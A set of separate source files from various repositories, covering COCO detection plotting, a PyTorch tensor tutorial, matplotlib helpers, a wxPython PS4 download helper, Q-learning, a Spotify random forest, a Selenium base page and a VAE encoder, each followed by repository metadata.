all_class = np.load('SSD_Lap_0.5_class.npy').item()
all_score = np.load('SSD_Lap_0.5_score.npy').item()
# The COCO category list is the same for every image: parse the (large)
# annotation JSON once instead of re-reading it on every loop iteration.
json_file = './annotations/instances_val2017.json'
with open(json_file, 'r') as COCO:
    js = json.loads(COCO.read())
class_names = [category['name'] for category in js['categories']]
# Images excluded from plotting (same set as the original chained `or` test).
SKIP = {'000000560011.jpg', '000000223188.jpg', '000000045070.jpg',
        '000000157213.jpg', '000000131386.jpg', '000000364636.jpg'}
for J in all_box.keys():
    K = J[14:]  # strip the leading directory prefix to get the bare file name
    if K in SKIP:
        continue
    img = load_image('./val2017/' + K)
    img = rescale(img, 300, 300)
    img = crop_center(img, 300, 300)
    img = normalize(img)
    out = img / 2 + 0.5  # undo the [-1, 1] normalization for display
    bboxes = all_box.get(J)
    classes = all_class.get(J)
    confidences = all_score.get(J)
    # Keep detections above the confidence threshold.
    # NOTE(review): squeeze() yields a 0-d array when exactly one detection
    # passes, which would break the iteration below — confirm upstream data.
    best = np.argwhere(confidences > 0.3).squeeze()
    print(K)
    fig, ax = plt.subplots(1)
    ax.imshow(out)
    for idx in best:
        left, top, right, bottom = bboxes[idx]
        # Boxes are stored normalized in [0, 1]; scale to the 300px crop.
        x, y, w, h = [val * 300 for val in [left, top, right - left, bottom - top]]
        rect = patches.Rectangle((x, y), w, h, linewidth=1, edgecolor='r', facecolor='none')
        ax.add_patch(rect)
        ax.text(x, y, class_names[classes[idx] - 1], bbox=dict(facecolor='white', alpha=0.5))
    plt.savefig(K)
    # Close the figure: without this every iteration leaks a live figure and
    # matplotlib memory use grows with the dataset size.
    plt.close(fig)
| zejiangh/Filter-GaP | DET/detection_plot.py | detection_plot.py | py | 1,610 | python | en | code | 30 | github-code | 90 |
28793652227 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: pytorch
# language: python
# name: python3
# ---
# ## Tensors Operations
#
# Tensors are the building block of all PyTotch operations.\
# At its core, PyTorch is a library for processing tensors. A tensor is a number, vector, matrix, or any n-dimensional array. Let's create a tensor with a single number.\
# \
# `Note`: all elements of a tensors require same data type.
#
#%%
import torch
# A zero-dimensional (scalar) tensor: its shape is empty.
a = torch.tensor(4.)
print(a.shape) # note: a is a scalar, there is no dimension to scalars.
a.dtype
#%%
v = torch.tensor([4., 5, 6, 7]) # all elements of a tensor share one data type
print(v.dtype)
v
v = torch.tensor([1, 2, 3, 4, 5, 6])
print(v[2:5]) # print items at indices 2, 3, 4 (the end index is exclusive)
v = torch.tensor([1, 2, 3, 4, 5, 6])
print(v[2:]) # print from index 2 until the end
v = torch.arange(2, 7) # create a vector of 2,3 .. 6 => tensor([2, 3, 4, 5, 6])
v = torch.arange(2, 7, 2) # create a vector with step 2 => tensor([2, 4, 6])
v
x = torch.arange(18).view(3, 2, 3) # create a 3D matrix
print(x[1, 0:1, 1:2]) # slice from matrix 1, row 0:1, column 1:2 (excluded)
print(x[1, :, :]) # slice from matrix 1: all rows, all columns
x
v = torch.FloatTensor([1, 2, 3, 4, 5, 6]) # create a float tensor
print(v.dtype)
v = torch.FloatTensor([1, 2, 3, 4, 5, 6]) # create a float tensor
print(v.view(3, 2)) # rearrange to a (3, 2) matrix
v = torch.FloatTensor([1, 2, 3, 4, 5, 6]) # create a float tensor
print(v.view(3, -1)) # -1 => infer the number of columns, rearrange to a (3, 2) matrix
# Vector Operations
# +
v1 = torch.tensor([1, 2, 3]) # create a vector of [1, 2, 3]
v2 = torch.tensor([1, 2, 3]) # create a vector of [1, 2, 3]
v1 * v2 # element wise multiplication => tensor([1, 4, 9])
v1 * 5 # multiply by scalar => tensor([ 5, 10, 15])
torch.dot(v1, v2) # dot product, v1[0] * v2[0] + v1[1] * v2[1] ... + v1[n] * v2[n] => 14
torch.linspace(0, 10, 5) # divide the space 0:10 into 5 points => tensor([ 0.0000,  2.5000,  5.0000,  7.5000, 10.0000])
# +
x = torch.linspace(0, 10, 100) # divide the space 0:10 into 100 points
y = torch.exp(x) # y = exponent of x
import matplotlib.pyplot as plt
plt.plot(x.numpy(), y.numpy())
# +
import matplotlib.pyplot as plt
# x = torch.arange(0, 1000., 1)
x = torch.linspace(0, 10, 100)
y1 = torch.exp(x)
y2 = torch.exp(torch.max(x) - x)
figure, axis = plt.subplots(1, 2)
axis[0].plot(x, y1)
axis[0].set_title("exp(x)")
# Second subplot: the mirrored exponential exp(max(x) - x).
axis[1].plot(x, y2)
# NOTE(review): this title does not match the plotted curve exp(max(x) - x);
# confirm the intended label before changing the displayed string.
axis[1].set_title("max(x) = x")
# Combine all the operations and display
plt.show()
# -
torch.arange(18)
ms = torch.arange(18).view(3, 3, 2)
print(ms)
print('max:', torch.max(ms))
print(ms[1, 1:2, 0:2])
# +
x = torch.linspace(0, 10, 100)
y1 = torch.exp(x)
y2 = torch.exp(torch.max(x) - x)
plt.plot(x.numpy(), y1.numpy())
plt.plot(x.numpy(), y2.numpy())
# -
v = torch.tensor([1, 2, 3, 4, 5, 6]) # create an integer (int64) tensor
print(v.size())
m = torch.tensor([[5., 6],
                  [7, 8],
                  [9, 10]])
print(m.shape)
m
a = torch.tensor([0, 3, 5, 5, 5, 2]).view(2, 3) # create a matrix of dim(2,3)
b = torch.tensor([3, 4, 3, -2, 4, -2]).view(3, 2) # create a matrix of dim(3, 2)
print(a @ b) # multiply a and b
print(torch.matmul(a, b)) # multiply a and b
# `Note`: matrix dimension must be kept on all rows and columns
d3 = torch.tensor([
    [[111, 112, 113],
     [121, 122, 123]],
    [[211, 212, 213],
     [221, 222, 223.]]])
print(d3.shape)
d3
# ## Tensor operations and gradients
# We can combine tensors with the usual arithmetic operations. Let's look at an example:
# create tensors.
x = torch.tensor(3.)
w = torch.tensor(4., requires_grad=True)
b = torch.tensor(5., requires_grad=True)
x, w, b
# We've created three tensors: `x`, `w`, and `b`, all numbers. `w` and `b` have an additional parameter `requires_grad` set to `True`. We'll see what it does in just a moment.
#
# Let's create a new tensor `y` by combining these tensors.
# arithmetic operations
y = w * x + b
y
# As expected, `y` is a tensor with the value `3 * 4 + 5 = 17`. What makes PyTorch unique is that we can automatically compute the derivative of `y` w.r.t. the tensors that have `requires_grad` set to `True` i.e. w and b. This feature of PyTorch is called _autograd_ (automatic gradients).
#
# To compute the derivatives, we can invoke the `.backward` method on our result `y`.
# compute derivatives
y.backward()
# The derivatives of `y` with respect to the input tensors are stored in the `<tensor>.grad` property of the respective tensors.
# display gradients, x = 3, w = 4, b = 5
print('dy/dx:', x.grad) # None: x was created without requires_grad, so no gradient is tracked
print('dy/dw:', w.grad) # dy/dw = x = 3 (differentiate y = w*x + b with respect to w)
print('dy/db:', b.grad) # dy/db = 1 (differentiate y = w*x + b with respect to b)
# As expected, `dy/dw` has the same value as `x`, i.e., `3`, and `dy/db` has the value `1`. Note that `x.grad` is `None` because `x` doesn't have `requires_grad` set to `True`.
#
# The "grad" in `w.grad` is short for _gradient_, which is another term for derivative. The term _gradient_ is primarily used while dealing with vectors and matrices.
27000293708 | # -*- coding:utf-8 -*-
'''
说明:
在matplotlib基础上的画图模块
'''
import matplotlib.pyplot as plt;
#设置figure的中文显示
#黑体 SimHei
#微软雅黑 Microsoft YaHei
#微软正黑体 Microsoft JhengHei
#新宋体 NSimSun
#新细明体 PMingLiU
#细明体 MingLiU
#标楷体 DFKai-SB
#仿宋 FangSong
#楷体 KaiTi
#仿宋_GB2312 FangSong_GB2312
#楷体_GB2312 KaiTi_GB2312
def set_ch():
    """Configure matplotlib to render Chinese glyphs (SimHei) and show minus signs correctly."""
    from pylab import mpl
    mpl.rcParams.update({
        'font.sans-serif': ['SimHei'],  # default font family for CJK text
        'axes.unicode_minus': False,    # keep '-' rendering when a CJK font is active
    })
# Curve description for a 2-D plot.
class Plot(object):
    """Hold the data and line style of one curve.

    Parameters
    ----------
    x, y : list
        Data coordinates. Defaults to fresh empty lists.
    label : str
        Legend label for this curve.
    color : str
        Line color.
    linestyle : str
        'solid' for a solid line, 'dashed' for a dashed line.
    linewidth : int
        Line width in points.
    """
    def __init__(self, x=None, y=None, label='', color='black', linestyle='solid', linewidth=1):
        # BUG FIX: the original used mutable default arguments (x=[], y=[]),
        # so every Plot built without data shared the same two lists.
        self.xarray = [] if x is None else x
        self.yarray = [] if y is None else y
        self.label = label
        self.color = color
        self.linestyle = linestyle
        self.linewidth = linewidth
# Caption (label) properties for one axis.
class AxisLabel(object):
    """Text and font size used when captioning an axis."""
    def __init__(self, name='axis', fontsize=10):
        self.name, self.fontsize = name, fontsize
# Lower/upper bounds of one axis.
class AxisLim(object):
    """Axis range: minimum and maximum displayed value."""
    def __init__(self, min, max):
        self.min, self.max = min, max
# Full description of one (x or y) axis.
class Axis(object):
    """Aggregate an axis' caption, limits, tick positions and tick-label rotation."""
    def __init__(self, label, lim, ticks, rotation=0):
        self.label = label
        self.lim = lim
        self.ticks = ticks
        self.rotation = rotation
# Records which grid cell (row, column, position) an axe occupies on the figure.
class AxePosition(object):
    """Associate a matplotlib axes object with its subplot grid coordinates."""
    def __init__(self, axe, row, column, position):
        self.axe = axe
        self.row, self.column, self.position = row, column, position
# Figure-drawing helper built on matplotlib.
class Draw2DFigure(object):
    # Initialise the figure and split it into row*column axes.
    def __init__(self,row=1,column=1):
        self.fig=plt.figure();
        self.axes=[];
        for i in range(1,row*column+1):
            self.set_axe_position(row,column,i);
    # Register the axe located at subplot (row, column, position) on the canvas.
    def set_axe_position(self,row,column,position):
        axe=self.fig.add_subplot(row,column,position);
        self.axes.append(AxePosition(axe,row,column,position));
    # Draw the curves `pts` (Plot instances) on the axe matching (row, column, position).
    def draw_plot(self,row,column,position,xaxis,yaxis,pts,title=''):
        for a in self.axes:
            if a.row==row and a.column==column and a.position==position:
                self.__set_xaxis(a.axe,xaxis);
                self.__set_yaxis(a.axe,yaxis);
                a.axe.set_title(title);
                for pt in pts:
                    a.axe.plot(pt.xarray,pt.yarray,label=pt.label,
                               color=pt.color,linewidth=pt.linewidth,
                               linestyle=pt.linestyle);
    # Show the finished figure. `location` selects matplotlib legend placement:
    #upper right <--> 1
    #upper left <--> 2
    #lower left <--> 3
    #lower right <--> 4
    #right <--> 5
    #center left <--> 6
    #center right <--> 7
    #lower center <--> 8
    #upper center <--> 9
    #center <--> 10
    def show_figure(self,location=1):
        plt.legend(loc=location);
        plt.show();
    # Apply an Axis description (label, limits, ticks, rotation) to the x axis.
    def __set_xaxis(self,axe,xaxis):
        axe.set_xlabel(xaxis.label.name,fontsize=xaxis.label.fontsize);
        axe.set_xlim(xaxis.lim.min,xaxis.lim.max);
        axe.xaxis.set_ticks(xaxis.ticks);
        if xaxis.rotation!=0:
            rotation=xaxis.rotation;
            for label in axe.xaxis.get_ticklabels():
                label.set_rotation(rotation);
    # Apply an Axis description (label, limits, ticks, rotation) to the y axis.
    def __set_yaxis(self,axe,yaxis):
        axe.set_ylabel(yaxis.label.name,fontsize=yaxis.label.fontsize);
        axe.set_ylim(yaxis.lim.min,yaxis.lim.max);
        axe.yaxis.set_ticks(yaxis.ticks);
        if yaxis.rotation!=0:
            rotation=yaxis.rotation;
            for label in axe.yaxis.get_ticklabels():
                label.set_rotation(rotation);
| hitosky/python_script | figure/drawfigure.py | drawfigure.py | py | 3,283 | python | en | code | 0 | github-code | 90 |
23650880553 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing
import wx
from proxy_server import (
ServerManager,
q,
IP,
PORT
)
import time
from wx.adv import TaskBarIcon
import images
import requests
from wx.lib.agw import infobar
import getpass
import threading
from wx.lib.delayedresult import startWorker
# System tray icon for the main window.
# NOTE(review): this subclass deliberately shadows the imported
# wx.adv.TaskBarIcon name — the base is resolved before the new binding.
class TaskBarIcon(TaskBarIcon):
    ID = wx.NewId()
    def __init__(self, frame):
        # `frame` is the main window to raise when the tray icon is used.
        wx.adv.TaskBarIcon.__init__(self)
        self.frame = frame
        self.SetIcon(wx.Icon(images.icon.GetIcon()))
    # override
    def CreatePopupMenu(self):
        # Raises the main window instead of building a menu; the implicit
        # None return tells wx not to show any popup.
        self.frame.Raise()
class MyWin(wx.Frame):
    """Main window: shows the download URL captured by the proxy process,
    expands it into the full multi-part .pkg list, and reports proxy status.
    """
    def __init__(self, parent, title):
        super(MyWin, self).__init__(parent, title=title, size=(800, 200))
        self.SetMinSize((800, 200))
        self.msg = ''  # last download URL received from the proxy process
        self.init_ui()
        self.Centre()
        self.Show()
        self.SetIcon(images.icon.GetIcon())
        self.job_id = 1  # token used to match delayed-worker results

    def init_ui(self):
        """Build the widgets, the 500 ms queue-polling timer and the status bar."""
        self.task_bar_icon = TaskBarIcon(self)
        self.Bind(wx.adv.EVT_TASKBAR_CLICK, self.on_task_bar_left_dclick)
        panel = wx.Panel(self)
        sizer = wx.GridBagSizer(0, 0)
        font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
        font.PointSize = 16
        self.SetFont(font)
        download_url = wx.StaticText(panel, label="游戏文件下载地址:")
        download_url.SetFont(font)
        sizer.Add(download_url, pos=(0, 0), flag=wx.ALL, border=10)
        self.tc1 = wx.TextCtrl(panel, style=wx.TE_MULTILINE | wx.TE_READONLY)
        sizer.Add(self.tc1, pos=(0, 1), flag=wx.EXPAND | wx.ALL, border=5)
        sizer.AddGrowableCol(1)
        sizer.AddGrowableRow(0)
        panel.SetSizerAndFit(sizer)
        hint_msg = wx.StaticText(panel, size=(200, 100), label="提示:\r通过第三方下载工具将文件下载至\r/Users/{}/Downloads".format(getpass.getuser()))
        sizer.Add(hint_msg, pos=(0, 2), flag=wx.ALL, border=5)
        # Poll the inter-process queue twice a second.
        self.timer = wx.Timer(self)
        self.Bind(wx.EVT_TIMER, self.on_timer, self.timer)
        self.timer.Start(500)
        self.Bind(wx.EVT_CLOSE, self.on_exit)
        self.statusbar = self.CreateStatusBar()
        self.statusbar.SetFieldsCount(2)
        self.SetStatusWidths([-1, 330])
        self.statusbar.SetStatusText('Starting proxy server on {} port {}'.format(IP, PORT), 0)
        # NOTE(review): on_clicked/_resultConsumer below reference self.btn1
        # and self.tc2, which are never created here — they look like
        # leftovers from an older layout; confirm before wiring them up.

    def check_download_pkg(self):
        """Probe consecutive part numbers after the captured .pkg URL and
        return all existing parts, newline-separated."""
        url = self.msg
        urls = '{}'.format(url)
        _url = url.split('.pkg')[0]
        no = int(_url[-2:])  # the two-digit part number at the end of the stem
        for i in xrange(1, 10):
            next_url = '{}{:0>2d}.pkg'.format(_url[:-2], no + i)
            resp = requests.head(next_url, timeout=10)
            if resp.status_code == 200:
                urls += '\r\n{}'.format(next_url)
            else:
                break  # parts are numbered contiguously; stop at first miss
        return urls

    def on_clicked(self, event):
        """Kick off the background part lookup (see NOTE in init_ui)."""
        if self.msg != '':
            self.btn1.Enable(False)
            self.tc2.SetValue('查询中请稍后。。。。。。_(:з」∠)_')
            startWorker(self._resultConsumer, self._resultProducer, jobID=self.job_id)

    def _resultConsumer(self, delayedResult):
        # Runs on the GUI thread when the worker finishes.
        job_id = delayedResult.getJobID()
        assert job_id == self.job_id
        try:
            result = delayedResult.get()
        except Exception as e:
            return
        self.tc2.SetValue(result)
        self.btn1.Enable(True)

    def _resultProducer(self):
        # Runs on the worker thread: does the blocking HTTP probing.
        urls = self.check_download_pkg()
        return urls

    def on_timer(self, event):
        """Drain one message from the proxy queue: a URL string, errno 48
        (address in use), or a [code, text] status pair."""
        try:
            msg = q.get(block=False)
            if type(msg) is str:
                self.msg = msg
                self.tc1.SetValue(msg)
            elif msg == 48:
                self.statusbar.SetStatusText('Error: Address already in use: ({}, {}).'.format(IP, PORT))
                dlg = wx.MessageDialog(self, 'Address already in use: ({}, {}).'.format(IP, PORT), 'Error:', wx.OK | wx.ICON_INFORMATION)
                dlg.ShowModal()
                dlg.Destroy()
            elif type(msg) is list:
                if msg[0] == 200:
                    self.statusbar.SetStatusText(msg[1], 1)
        except Exception as e:
            pass  # queue empty — nothing to do this tick

    def on_exit(self, event):
        # Stop the proxy subprocess before tearing down the GUI.
        p.terminate()
        time.sleep(0.1)
        wx.Exit()

    def on_task_bar_left_dclick(self, event):
        # BUG FIX: this handler lives on the frame itself; the original
        # referenced a nonexistent `self.frame` attribute (copied from
        # TaskBarIcon) and raised AttributeError on every taskbar click.
        self.Show(True)
        self.Raise()
if __name__ == '__main__':
    # Run the proxy server in a separate process so the wx event loop stays
    # responsive; the GUI reads its messages from the shared queue `q`.
    p_server = ServerManager()
    app = wx.App()
    my_win = MyWin(None, 'PS4 download helper (alpha)')
    p = multiprocessing.Process(target=p_server.start)
    p.start()
    app.MainLoop()
| FuriousSlade/PS4DownloadHepler | ui.py | ui.py | py | 4,578 | python | en | code | 0 | github-code | 90 |
45203418798 | import gym
from random import randint
import numpy as np
# Crear el entorno MountainCar-v0 (classic-control task, 3 discrete actions)
env = gym.make('MountainCar-v0')
def discretizar(valor):
    """Discretise a continuous observation into a cell of the 20x20 Q-table grid."""
    # `valor` arrives either as (obs, info) from env.reset() or wrapped as
    # [obs]; only the first two components (position, velocity) are used.
    obs = np.array(valor[0][:2])
    low = env.observation_space.low
    high = env.observation_space.high
    scaled = ((obs - low) / (high - low)) * 20
    return tuple(scaled.astype(np.int32))
# Q-table: one entry per discretised (position, velocity) cell and action.
q_table = np.random.uniform(low=-1, high=1, size=[20, 20, 3])
tasa_aprendizaje = 0.1   # alpha: learning rate
factor_descuento = 0.95  # gamma: discount factor
episodios = 5000
listados_recompensas = []
# Ciclo principal (main training loop)
for episodio in range(episodios):
    final = False
    recompensa_total = 0
    estado = discretizar(env.reset())
    while not final:
        # Epsilon-greedy action selection (~80% exploit, ~20% explore).
        if randint(0, 10) > 2:
            accion = np.argmax(q_table[estado])
        else:
            accion = randint(0, 2)
        nuevo_estado, recompensa, terminado, truncado, info = env.step(accion)
        # BUG FIX: with the 5-tuple gym step API an episode must also end on
        # truncation (time limit). The original only checked the `terminated`
        # flag, so an episode only ended when the goal was actually reached.
        final = terminado or truncado
        q_table[estado][accion] = q_table[estado][accion] + tasa_aprendizaje * \
            (recompensa + factor_descuento *
             np.max(q_table[discretizar([nuevo_estado])]) - q_table[estado][accion])
        estado = discretizar([nuevo_estado])
        recompensa_total += recompensa
        # Renderizar el entorno (only every 500th episode, to keep training fast)
        if (episodio + 1) % 500 == 0:
            env.render()
    listados_recompensas.append(recompensa_total)
    if (episodio + 1) % 100 == 0:
        print(f"Episodio {episodio+1} - Recompensa: {np.mean(listados_recompensas)}")
# Cerrar el entorno
env.close()
| edwinscastrob/IA | Algoritmos/Qlearning.py | Qlearning.py | py | 1,425 | python | es | code | 0 | github-code | 90 |
16516293012 | #!/usr/bin/env python3
# dataset: https://www.kaggle.com/lehaknarnauli/spotify-datasets
import json
import time
import numpy
import numpy as np
from regtree.tree import RandomForest
from utils import load_data_from_csv
def check(
    train,
    test,
    feedback: bool,
    trees: int,
    samples: int,
    max_depth: int,
    attr_incl: float,
):
    """Train a RandomForest on `train`, evaluate it on `test`, and print the
    configuration, timings, average error and one example prediction."""
    print(f"Starting training on {len(train)} data samples")
    print(f"= Feedback {'enabled' if feedback else 'disabled'}")
    print(f"= Forest size: {trees}")
    print(f"= Sample size: {samples}")
    print(f"= Max depth: {max_depth}")
    print(f"= Attribute inclusion: {attr_incl}")

    started = time.perf_counter()
    forest = RandomForest()
    forest.fit(feedback, train, trees, samples, max_depth, attr_incl, False)
    elapsed = time.perf_counter() - started
    print(f"Finished training in: {round(elapsed, 1)}s")
    print()

    print(f"Starting testing on {len(test)} data samples")
    started = time.perf_counter()
    avg_error = forest.perform(test, False)
    elapsed = time.perf_counter() - started
    print(f"Finished testing in: {round(elapsed, 1)}s")
    print(f"Avg. error: {round(avg_error, 1)}")

    # Sanity-check prediction on one hand-picked feature vector.
    sample = np.array([0, 248973, 0.605, 0.882, 9, -3.028, 0, 0.029,
                       0.0000313, 0.614, 0.135, 0.418, 140.026, 4])
    prediction = forest.predict(sample)
    print(f"Predicted: {prediction}")
def main():
    """Load the Spotify tracks dataset, balance it per release year by
    oversampling, shuffle, split, and run one model-training experiment.

    NOTE: the oversampling and shuffle below consume global NumPy RNG state
    in a fixed order — do not reorder these steps.
    """
    # index 0 is the value, the rest are the attributes
    a = load_data_from_csv("data/tracks_processed_fix.csv")
    # remove entries with less than 1950 in the first column
    a = a[a[:, 0] >= 1950]
    # remove outliers based on standard deviation in all columns
    # for i in range(1, len(a[0])):
    #     mean = np.mean(a[:, i])
    #     std = np.std(a[:, i])
    #     a = a[np.abs(a[:, i] - mean) < 3 * std]
    # sort by year
    a = a[a[:, 0].argsort()]
    # group by year (split where the year value changes)
    a = np.split(a, np.where(np.diff(a[:, 0]))[0] + 1)
    # ensure that each year has the same number of entries by oversampling
    # (2500 rows drawn with replacement per year group)
    for i in range(len(a)):
        b = np.random.choice(a[i].shape[0], 2500, replace=True)
        a[i] = a[i][b]
    # flatten
    a = np.concatenate(a)
    # shuffle the data
    np.random.shuffle(a)
    # split the data into training and testing
    dataset_len = len(a)
    training_size = 0.6
    testing_size = 0.07
    training = a[: int(dataset_len * training_size)]
    testing = a[int(dataset_len * training_size): int(dataset_len * (testing_size + training_size))]
    # Model testing
    check(training, testing, True, 50, 5000, 10, 0.34)
    print("\n=======================\n")
# Script entry point.
if __name__ == "__main__":
    main()
| RouNNdeL/uma-projekt | spotify.py | spotify.py | py | 2,802 | python | en | code | 0 | github-code | 90 |
20163500081 | #-*-coding: UTF-8 -*-
'''
Created on 2019年12月9日
@author: LIJY
'''
from selenium.webdriver.remote.webdriver import WebDriver
import time
from futurn_loan.common.mylogging import mylogging
from futurn_loan.common.basepath import screenshot_path
import os
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import traceback
from selenium.webdriver.common.action_chains import ActionChains
class BasePage():
def __init__(self,driver:WebDriver):
self.driver = driver
# 等待元素可见
def wait_until_visible(self,ele_loc,img_doc,timeout = 10,poll_fre=0.5):
mylogging.info("等待{}元素出现...",img_doc)
start_time = time.time()
try:
WebDriverWait(self.driver,timeout,poll_fre).until(EC.visibility_of_any_elements_located, ele_loc)
except:
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("等待{}元素可见,耗时{}...".format(img_doc,dur_time))
# 查询元素是否存在
def wait_until_exist(self,ele_loc,img_doc,timeout = 10,poll_fre=0.5):
mylogging.info("等待{}元素出现...",img_doc)
start_time = time.time()
try:
WebDriverWait(self.driver,timeout,poll_fre).until(EC.presence_of_element_located, ele_loc)
except:
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("等待{}元素存在,耗时{}...".format(img_doc,dur_time))
def get_ele(self,ele_loc,img_doc):
mylogging.info("获取元素{}开始...".format(img_doc))
start_time = time.time()
try:
ele = self.driver.find_element(*ele_loc)
except:
# 获取失败,写日志,截图,抛出异常
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
# 获取成功,记录时间,记录日志,返回元素
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("获取{}元素,耗时{}...".format(img_doc,dur_time))
return ele
def input_text(self,ele_loc,text,img_doc):
mylogging.info("{}输入文字{}开始...".format(img_doc,text))
start_time = time.time()
# 等待元素可见,获取元素
self.wait_until_visible(ele_loc, img_doc)
ele = self.get_ele(ele_loc, img_doc)
try:
ele.send_keys(text)
except:
# 获取失败,写日志,截图,抛出异常
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("获取{}元素,耗时{}...".format(img_doc,dur_time))
def ele_click(self,ele_loc,img_doc):
mylogging.info("点击元素{}开始...".format(img_doc))
start_time = time.time()
# 等待元素可见,获取元素
self.wait_until_visible(ele_loc, img_doc)
ele = self.get_ele(ele_loc, img_doc)
try:
ele.click()
except:
# 获取失败,写日志,截图,抛出异常
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("点击{}元素,耗时{}...".format(img_doc,dur_time))
def get_text(self,ele_loc,img_doc):
mylogging.info("获取{}元素txt开始...".format(img_doc))
start_time = time.time()
# 等待元素可见,获取元素
self.wait_until_visible(ele_loc, img_doc)
ele = self.get_ele(ele_loc, img_doc)
try:
text = ele.text
except:
# 获取失败,写日志,截图,抛出异常
debug_logging = "**********ele_loc".format(ele_loc)
mylogging.error(debug_logging)
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("获取{}元素text,耗时{}...".format(img_doc,dur_time))
return text
# 获取元素的属性值
def get_attr(self,ele_loc,attr,img_doc):
mylogging.info("获取{}元素{}参数开始...".format(img_doc,attr))
start_time = time.time()
self.wait_until_exist(ele_loc, img_doc)
ele = self.get_ele(ele_loc, img_doc)
try:
attr = ele.get_attribute(attr)
except:
# 获取失败,写日志,截图,抛出异常
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("获取{}元素值为{}耗时{}...".format(img_doc,attr,dur_time))
return attr
def is_btn_enabled(self,ele_loc,img_doc):
# 返回按钮是否可用
mylogging.info("判断元素{}是否可用开始...".format(img_doc))
start_time = time.time()
self.wait_until_exist(ele_loc, img_doc)
ele = self.get_ele(ele_loc, img_doc)
return ele.is_enabled()
# 鼠标悬浮
def mouse_on(self,ele_loc,img_doc):
mylogging.info("鼠标悬浮{}开始...".format(img_doc))
start_time = time.time()
self.wait_until_exist(ele_loc, img_doc)
ele = self.get_ele(ele_loc, img_doc)
try:
ActionChains(self.driver).move_to_element(ele).perform()
except:
# 获取失败,写日志,截图,抛出异常
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("鼠标悬浮{}元素text,耗时{}...".format(img_doc,dur_time))
    # Switch the driver into an iframe (original comment wrongly said "mouse hover")
def switch_to_iframe(self,ele_loc,img_doc):
mylogging.info("切换iframe{}开始...".format(img_doc))
start_time = time.time()
self.wait_until_exist(ele_loc, img_doc)
ele = self.get_ele(ele_loc, img_doc)
try:
self.driver.switch_to.frame(ele)
except:
# 获取失败,写日志,截图,抛出异常
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("切换iframe{}结束,耗时{}...".format(img_doc,dur_time))
    # Set an element attribute via JavaScript (original comment wrongly said "mouse hover")
def set_attr(self,ele_loc,attr,value,img_doc,):
mylogging.info("修改{}属性{}值为{}开始...".format(img_doc,attr,value))
start_time = time.time()
self.wait_until_exist(ele_loc, img_doc)
ele = self.get_ele(ele_loc, img_doc)
try:
self.driver.execute_script('arguments[0].{}={}'.format(attr,value))
except:
# 获取失败,写日志,截图,抛出异常
mylogging.error(traceback.format_exc())
self.screenshot_save(img_doc)
raise
else:
end_time = time.time()
dur_time = end_time - start_time
mylogging.info("修改{}属性{}值为{}结束,耗时{}...".format(img_doc,attr,value,dur_time))
def screenshot_save(self,img_doc):
# 保存截图传入名称拼接当前时间命名
nowtime = time.strftime('%Y-%m-%d_%HH-%MM-%SS', time.localtime())
img_name = img_doc + nowtime + ".png"
# 拼接截图名称与截图保存路径
img_file_path = os.path.join(screenshot_path,img_name)
try:
mylogging.info("保存截图{}...".format(img_name))
self.driver.save_screenshot(img_file_path)
except:
# 保存截图报错则写日志
mylogging.exception("保存截图{}报错...".format(img_name))
| 531612146/web_auto | common/basepage.py | basepage.py | py | 8,784 | python | en | code | 0 | github-code | 90 |
43344620656 | import torch
import torch.nn as nn
from torch.autograd import Variable
class Encoder(nn.Module):
    """Convolutional VAE encoder.

    Maps an image batch (nc, isize, isize) to a sampled latent vector plus
    the mean and log-variance of the approximate posterior q(z|x).
    isize must be divisible by 16 (four stride-2 convolutions).
    """
    def __init__(self, nc, nef, nz, isize, device):
        super(Encoder, self).__init__()
        # Device kept for interface compatibility (sampling now uses
        # randn_like, which inherits device/dtype from its input).
        self.device = device
        # Encoder: (nc, isize, isize) -> (nef*8, isize//16, isize//16)
        self.encoder = nn.Sequential(
            nn.Conv2d(nc, nef, 4, 2, padding=1),
            nn.LeakyReLU(0.2, True),
            nn.BatchNorm2d(nef),
            nn.Conv2d(nef, nef*2, 4, 2, padding=1),
            nn.LeakyReLU(0.2, True),
            nn.BatchNorm2d(nef*2),
            nn.Conv2d(nef*2, nef*4, 4, 2, padding=1),
            nn.LeakyReLU(0.2, True),
            nn.BatchNorm2d(nef*4),
            nn.Conv2d(nef*4, nef*8, 4, 2, padding=1),
            nn.LeakyReLU(0.2, True),
            nn.BatchNorm2d(nef*8)
        )
        # Map the flattened feature map to latent mean and (log)variance.
        out_size = isize // 16
        self.mean = nn.Linear(nef*8*out_size*out_size, nz)
        self.logvar = nn.Linear(nef*8*out_size*out_size, nz)
    def reparametrize(self, mu, logvar):
        """Sample z = mu + std * eps with eps ~ N(0, I).

        FIX: replaced the deprecated autograd.Variable / torch.FloatTensor
        pair with torch.randn_like, which is also device/dtype safe.
        """
        std = logvar.mul(0.5).exp_()
        eps = torch.randn_like(std)
        return eps.mul(std).add_(mu)
    def forward(self, inputs):
        """Return (sampled latent z, posterior mean, posterior log-variance)."""
        batch_size = inputs.size(0)
        hidden = self.encoder(inputs).view(batch_size, -1)
        mean, logvar = self.mean(hidden), self.logvar(hidden)
        latent_z = self.reparametrize(mean, logvar)
        return latent_z, mean, logvar
